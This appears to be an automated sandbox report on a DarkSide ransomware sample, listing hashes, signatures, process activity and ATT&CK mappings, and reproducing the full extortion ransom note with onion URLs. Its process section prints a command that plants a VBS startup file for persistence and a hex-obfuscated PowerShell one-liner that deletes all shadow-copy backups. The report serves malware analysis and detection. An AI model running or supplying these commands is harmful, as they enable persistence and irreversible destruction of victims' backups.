darkside | f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589

General

Target

cd2fb1d044d414dcbf32bf67f2563208.exe
Size

2.3MB
MD5

cd2fb1d044d414dcbf32bf67f2563208
SHA1

98dae9d51bc1ee7d619a546550adc2e98113db17
SHA256

f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589
SHA512

88a89c729f4edf3cb944de03bed2177cb9b2791de261bbdb15ebeceb075311ba9318abedfa8380a194062b048496f43c9a5bbfdf712f96a69aa4b5d80c1adbde
SSDEEP

49152:kloF0g3n0xTxvO0REE0zVeWbKr9P95upyQQoQxlyxBf9NGFzdCh:kloeO0e35NKpPrqyLo4ah9+Mh

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\README.398da5ec.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, private data was downloaded. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 300GB data. Your personal leak page (TOR LINK): http://darksidedxcftmqa.onion/homehardware/K4fLrrmO5GOIBHbhfJyN5rG4pkPcRlnc48ceUHtNgjONruPRTVc4Usyb96BuHkKa On the page you will find examples of files that have been downloaded. The data is preloaded and will be automatically published in our blog if you do not pay. After publication, your data can be downloaded by anyone, it stored on our tor CDN and will be available for at least 6 months. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. HOW TO CONTACT US? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/FJ6BL608YXVN8DGFDP23JVF2RU0K0IC102LSJA09Z2JF14A1SCCJBOVPLRHSLU16 When you open our website, put the following data in the input form: Key: FSGLQojvXe6Tvm2w0wxP3QfWkJb1USBnFsbmL4CiIX0sBiV727ofcmrdJmUTgBStIrH7sgcBDo4SPki6BniKhpd7d4zjLSAxmtlwLAHLgtBnwYPuW05gxF4VPuXsylwu2p3k6ZWDTjCIZVVG04RCYEfS3AP25AWqGkFDh4KVy7MZsCVH7RwxEdhWyApxi7Ioai3v52ofbfNgys0V0sG2xWqJgtluhQ4J23O7jCZxqMM10civs8NlDmeJAiIkI43RrPDd3P2kA03ky3oUBNeUPOOnAztZQezpfAgiM8evd3HE9aua1yUEX4hndxmFU02CEYIiyah3g5ywISASKAeiXKCJoThOot42MHwMCl0G7wP6KdHVyPx8uhBdT2kbzvjGZvmOibfxKUlxJlhai4DhjDp9mUuJajTrBYoeogvOzrgc8iv0PcrAABLRGU2I9uSFIlFqZeuIp7qMW7DIZKrunidyvfL1oTtuosI8bQ0BVvooDC1BB5n5Biw9x2yBNit4lOjMhY00P3wTLvMhS3ZQ6eGKDmx7GrQ7ydGo6I2A0eQx9dpuxhWpkpc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/homehardware/K4fLrrmO5GOIBHbhfJyN5rG4pkPcRlnc48ceUHtNgjONruPRTVc4Usyb96BuHkKa

http://darksidfqzcuhtk2.onion/FJ6BL608YXVN8DGFDP23JVF2RU0K0IC102LSJA09Z2JF14A1SCCJBOVPLRHSLU16

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (155) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Drops startup file 1 IoCs

Processes:

cmd.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Suspicious use of SetThreadContext 1 IoCs

Processes:

cd2fb1d044d414dcbf32bf67f2563208.exe

description pid process target process

PID 952 set thread context of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe cd2fb1d044d414dcbf32bf67f2563208.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs	cmd.exe

description	pid	process	target process
PID 952 set thread context of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe

Modifies registry class 5 IoCs

Processes:

cmd.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.398da5ec	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.398da5ec\ = "398da5ec"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec\DefaultIcon	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\398da5ec.ico"	cmd.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

cd2fb1d044d414dcbf32bf67f2563208.execd2fb1d044d414dcbf32bf67f2563208.exepowershell.execmd.exe

pid	process
952	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2936	cd2fb1d044d414dcbf32bf67f2563208.exe
2808	powershell.exe
2664	cmd.exe
2664	cmd.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

cmd.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2664	cmd.exe
Token: SeSecurityPrivilege	2664	cmd.exe
Token: SeTakeOwnershipPrivilege	2664	cmd.exe
Token: SeLoadDriverPrivilege	2664	cmd.exe
Token: SeSystemProfilePrivilege	2664	cmd.exe
Token: SeSystemtimePrivilege	2664	cmd.exe
Token: SeProfSingleProcessPrivilege	2664	cmd.exe
Token: SeIncBasePriorityPrivilege	2664	cmd.exe
Token: SeCreatePagefilePrivilege	2664	cmd.exe
Token: SeBackupPrivilege	2664	cmd.exe
Token: SeRestorePrivilege	2664	cmd.exe
Token: SeShutdownPrivilege	2664	cmd.exe
Token: SeDebugPrivilege	2664	cmd.exe
Token: SeSystemEnvironmentPrivilege	2664	cmd.exe
Token: SeRemoteShutdownPrivilege	2664	cmd.exe
Token: SeUndockPrivilege	2664	cmd.exe
Token: SeManageVolumePrivilege	2664	cmd.exe
Token: 33	2664	cmd.exe
Token: 34	2664	cmd.exe
Token: 35	2664	cmd.exe
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeBackupPrivilege	2556	vssvc.exe
Token: SeRestorePrivilege	2556	vssvc.exe
Token: SeAuditPrivilege	2556	vssvc.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

cd2fb1d044d414dcbf32bf67f2563208.exe

pid process

952 cd2fb1d044d414dcbf32bf67f2563208.exe
952 cd2fb1d044d414dcbf32bf67f2563208.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

cd2fb1d044d414dcbf32bf67f2563208.execd2fb1d044d414dcbf32bf67f2563208.execmd.exe

description	pid	process	target process
PID 952 wrote to memory of 1896	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 952 wrote to memory of 1896	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 952 wrote to memory of 1896	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 952 wrote to memory of 1896	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 952 wrote to memory of 2936	952	cd2fb1d044d414dcbf32bf67f2563208.exe	cd2fb1d044d414dcbf32bf67f2563208.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2936 wrote to memory of 2664	2936	cd2fb1d044d414dcbf32bf67f2563208.exe	cmd.exe
PID 2664 wrote to memory of 2808	2664	cmd.exe	powershell.exe
PID 2664 wrote to memory of 2808	2664	cmd.exe	powershell.exe
PID 2664 wrote to memory of 2808	2664	cmd.exe	powershell.exe
PID 2664 wrote to memory of 2808	2664	cmd.exe	powershell.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe
"C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
2⤵
- Drops startup file
PID:1896

C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe
C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe
3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2556

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /D /T
1⤵
PID:3936

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
951fbf2cb7c24736811bc60cd721e87a

SHA1
4f8a81e1ba315801435eac03d24bab34a3f98324

SHA256
7a05674267fdfa82e3f610f8d3ba8d8c2793899547a9e8d4f6c683be1b80c2f6

SHA512
320b63d736ebbc976c5b76fd7d96073be97c08084ca67c00c11caf5dd297daf20b4431fb7e25267d0e6e2faf15ef1a6af4160a3a0eec218e204fb1227a90d0c0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
Filesize
133B

MD5
458d6a199affafd2e9be5198c5ab8d6b

SHA1
ca8f469292204a3c10f0bc4dd25c4f3f77e09e1d

SHA256
bdcd987973f6215c09b1f22452e93459c9d8b0b8646927c85b96f6ecafd120b7

SHA512
9e667d11143f8ac3db1eece5d67348ff34e2384b994e4601f3ba93c4001e5bc6156541b6535218ef0c7f1b64af3f14d15add881240ec45e09ce7734f74ef5bb2

Download Submit
C:\Users\Admin\README.398da5ec.TXT
Filesize
2KB

MD5
8f3af937b073ccc1eb6e0693c3922e1e

SHA1
5a74d49a712238cfd8989fddf0aff1828bee6be6

SHA256
2a301030357315a94c20d0ce0d9b12848d9c451a9836dbc8e4d5674444291975

SHA512
2c628ec9774aeff244985217079bbdb72b6af7c123f0caace5e14a7f89286ccf16bb29ae022b015a3e52158cc26b080d2a74627aaf843f466cc1328c85a0fabc

Download Submit
memory/952-0-0x00000000001E0000-0x00000000001E5000-memory.dmp

Filesize
20KB

Download
memory/2664-68-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-57-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-61-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-207-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-62-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-63-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-64-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-65-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-66-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-67-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-59-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-60-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-56-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-3049-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-69-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-70-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-71-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-37-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-58-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-40-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-34-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/2664-35-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2664-36-0x000000007780F000-0x0000000077810000-memory.dmp

Filesize
4KB

Download
memory/2664-39-0x0000000000080000-0x0000000000081000-memory.dmp

Filesize
4KB

Download
memory/2808-51-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/2808-55-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

Filesize
9.6MB

Download
memory/2808-48-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

Filesize
9.6MB

Download
memory/2808-47-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2808-53-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

Filesize
9.6MB

Download
memory/2808-54-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/2808-52-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/2808-49-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/2808-50-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2936-25-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2936-15-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-33-0x000000000EC70000-0x000000000EDF0000-memory.dmp

Filesize
1.5MB

Download
memory/2936-31-0x000000000D2B0000-0x000000000D32B000-memory.dmp

Filesize
492KB

Download
memory/2936-30-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-29-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-32-0x000000007780F000-0x0000000077810000-memory.dmp

Filesize
4KB

Download
memory/2936-23-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-21-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-19-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-17-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-41-0x000000000D2B0000-0x000000000D32B000-memory.dmp

Filesize
492KB

Download
memory/2936-13-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-10-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-9-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-8-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-7-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-6-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-5-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-4-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-3-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2936-2-0x0000000000300000-0x0000000000400000-memory.dmp

Filesize
1024KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads